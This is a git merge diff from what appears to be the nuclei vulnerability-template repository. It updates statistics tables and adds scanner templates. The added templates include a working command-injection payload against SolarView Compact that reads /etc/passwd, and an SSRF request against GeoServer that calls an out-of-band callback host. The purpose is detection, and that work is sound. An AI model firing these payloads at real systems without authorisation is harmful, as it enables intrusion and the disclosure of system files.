Merge branch 'master' into dashboard

.new-additions

@@ -3,12 +3,14 @@ cves/2018/CVE-2018-17422.yaml
 cves/2021/CVE-2021-20123.yaml
 cves/2021/CVE-2021-20124.yaml
 cves/2021/CVE-2021-25075.yaml
+cves/2021/CVE-2021-40822.yaml
 cves/2021/CVE-2021-46379.yaml
 cves/2021/CVE-2021-46422.yaml
 cves/2021/CVE-2021-46424.yaml
 cves/2022/CVE-2022-1392.yaml
 cves/2022/CVE-2022-1598.yaml
 cves/2022/CVE-2022-21705.yaml
+cves/2022/CVE-2022-29303.yaml
 cves/2022/CVE-2022-30489.yaml
 default-logins/octobercms-default-login.yaml
 exposed-panels/solarview-compact-panel.yaml
@@ -17,5 +19,6 @@ misconfiguration/oracle-ebusiness-registration-enabled.yaml
 misconfiguration/unauth-wavink-panel.yaml
 misconfiguration/xss-deprecated-header.yaml
 technologies/kubernetes-operational-view-detect.yaml
+token-spray/api-chaos.yaml
 vulnerabilities/wordpress/seo-redirection-xss.yaml
 workflows/yonyou-nc-workflow.yaml

README.md

@@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
 
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1156 | daffainfo     |   560 | cves             |  1160 | info     |  1192 | http    |  3187 |
+| cve       |  1168 | daffainfo     |   564 | cves             |  1172 | info     |  1198 | http    |  3209 |
-| panel     |   515 | dhiyaneshdk   |   421 | exposed-panels   |   523 | high     |   874 | file    |    68 |
+| panel     |   517 | dhiyaneshdk   |   423 | exposed-panels   |   525 | high     |   885 | file    |    68 |
-| lfi       |   461 | pikpikcu      |   316 | vulnerabilities  |   452 | medium   |   662 | network |    50 |
+| lfi       |   464 | pikpikcu      |   315 | vulnerabilities  |   453 | medium   |   667 | network |    50 |
-| xss       |   367 | pdteam        |   262 | technologies     |   255 | critical |   414 | dns     |    17 |
+| xss       |   371 | pdteam        |   262 | technologies     |   256 | critical |   415 | dns     |    17 |
-| wordpress |   364 | geeknik       |   179 | exposures        |   204 | low      |   183 |         |       |
+| wordpress |   368 | geeknik       |   179 | exposures        |   204 | low      |   182 |         |       |
-| exposure  |   293 | dwisiswant0   |   168 | misconfiguration |   197 | unknown  |     6 |         |       |
+| rce       |   296 | dwisiswant0   |   168 | misconfiguration |   200 | unknown  |     6 |         |       |
-| rce       |   291 | princechaddha |   133 | workflows        |   186 |          |       |         |       |
+| exposure  |   294 | princechaddha |   137 | workflows        |   187 |          |       |         |       |
-| cve2021   |   283 | 0x_akoko      |   130 | token-spray      |   154 |          |       |         |       |
+| cve2021   |   289 | 0x_akoko      |   134 | token-spray      |   155 |          |       |         |       |
-| tech      |   271 | gy741         |   118 | default-logins   |    95 |          |       |         |       |
+| tech      |   272 | gy741         |   119 | default-logins   |    96 |          |       |         |       |
-| wp-plugin |   264 | pussycat0x    |   116 | file             |    68 |          |       |         |       |
+| wp-plugin |   268 | pussycat0x    |   116 | file             |    68 |          |       |         |       |
 
-**261 directories, 3543 files**.
+**262 directories, 3566 files**.
 
 </td>
 </tr>

TOP-10.md

@@ -1,12 +1,12 @@
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1156 | daffainfo     |   560 | cves             |  1160 | info     |  1192 | http    |  3187 |
+| cve       |  1168 | daffainfo     |   564 | cves             |  1172 | info     |  1198 | http    |  3209 |
-| panel     |   515 | dhiyaneshdk   |   421 | exposed-panels   |   523 | high     |   874 | file    |    68 |
+| panel     |   517 | dhiyaneshdk   |   423 | exposed-panels   |   525 | high     |   885 | file    |    68 |
-| lfi       |   461 | pikpikcu      |   316 | vulnerabilities  |   452 | medium   |   662 | network |    50 |
+| lfi       |   464 | pikpikcu      |   315 | vulnerabilities  |   453 | medium   |   667 | network |    50 |
-| xss       |   367 | pdteam        |   262 | technologies     |   255 | critical |   414 | dns     |    17 |
+| xss       |   371 | pdteam        |   262 | technologies     |   256 | critical |   415 | dns     |    17 |
-| wordpress |   364 | geeknik       |   179 | exposures        |   204 | low      |   183 |         |       |
+| wordpress |   368 | geeknik       |   179 | exposures        |   204 | low      |   182 |         |       |
-| exposure  |   293 | dwisiswant0   |   168 | misconfiguration |   197 | unknown  |     6 |         |       |
+| rce       |   296 | dwisiswant0   |   168 | misconfiguration |   200 | unknown  |     6 |         |       |
-| rce       |   291 | princechaddha |   133 | workflows        |   186 |          |       |         |       |
+| exposure  |   294 | princechaddha |   137 | workflows        |   187 |          |       |         |       |
-| cve2021   |   283 | 0x_akoko      |   130 | token-spray      |   154 |          |       |         |       |
+| cve2021   |   289 | 0x_akoko      |   134 | token-spray      |   155 |          |       |         |       |
-| tech      |   271 | gy741         |   118 | default-logins   |    95 |          |       |         |       |
+| tech      |   272 | gy741         |   119 | default-logins   |    96 |          |       |         |       |
-| wp-plugin |   264 | pussycat0x    |   116 | file             |    68 |          |       |         |       |
+| wp-plugin |   268 | pussycat0x    |   116 | file             |    68 |          |       |         |       |

cves/2021/CVE-2021-40822.yaml

@@ -0,0 +1,45 @@
+id: CVE-2021-40822
+
+info:
+  name: Geoserver - SSRF
+  author: For3stCo1d
+  severity: high
+  description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows SSRF via the option for setting a proxy host.
+  reference:
+    - https://gccybermonks.com/posts/cve-2021-40822/
+    - https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-40822
+    - https://github.com/geoserver/geoserver/releases
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-40822
+    cwe-id: CWE-918
+  metadata:
+    fofa-query: app="GeoServer"
+    verified: "true"
+  tags: cve2021,ssrf,geoserver,cve
+
+requests:
+  - raw:
+      - |
+        POST /geoserver/TestWfsPost HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"
+
+      - type: word
+        words:
+          - "<html><head></head><body>"
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-46422.yaml

@@ -2,7 +2,7 @@ id: CVE-2021-46422
 
 info:
   name: SDT-CW3B1 1.1.0 - OS Command Injection
-  author: remote
+  author: badboycxcc
   severity: critical
   description: |
     Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.

cves/2022/CVE-2022-29303.yaml

@@ -0,0 +1,34 @@
+id: CVE-2022-29303
+
+info:
+  name: SolarView Compact 6.0 - OS Command Injection
+  author: badboycxcc
+  severity: high
+  description: |
+    SolarView Compact ver.6.00 was discovered to contain a command injection vulnerability via conf_mail.php.
+  reference:
+    - https://www.exploit-db.com/exploits/50940
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303
+    - https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing
+  metadata:
+    shodan-query: http.html:"SolarView Compact"
+    verified: "true"
+  tags: cve,cve2022,rce,injection
+
+variables:
+  cmd: "cat${IFS}/etc/passwd"
+
+requests:
+  - raw:
+      - |
+        POST /conf_mail.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0"

headless/extract-urls.yaml

@@ -16,7 +16,9 @@ headless:
         name: extract
         args:
           code: |
-            '\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\r\n') + '\n'
+            () => {
+             return '\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\r\n') + '\n'
+            }
     extractors:
       - type: kval
         part: extract

token-spray/api-chaos.yaml

@@ -0,0 +1,25 @@
+id: api-chaos
+
+info:
+  name: Chaos API Test
+  author: 0ri2N
+  severity: info
+  reference:
+    - https://chaos.projectdiscovery.io/#/docs
+  tags: dns,recon,chaos,token-spray,projectdiscovery
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://dns.projectdiscovery.io/dns/projectdiscovery.io"
+    headers:
+      Authorization: "{{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"domain":'
+          - '"subdomains":'
+        condition: and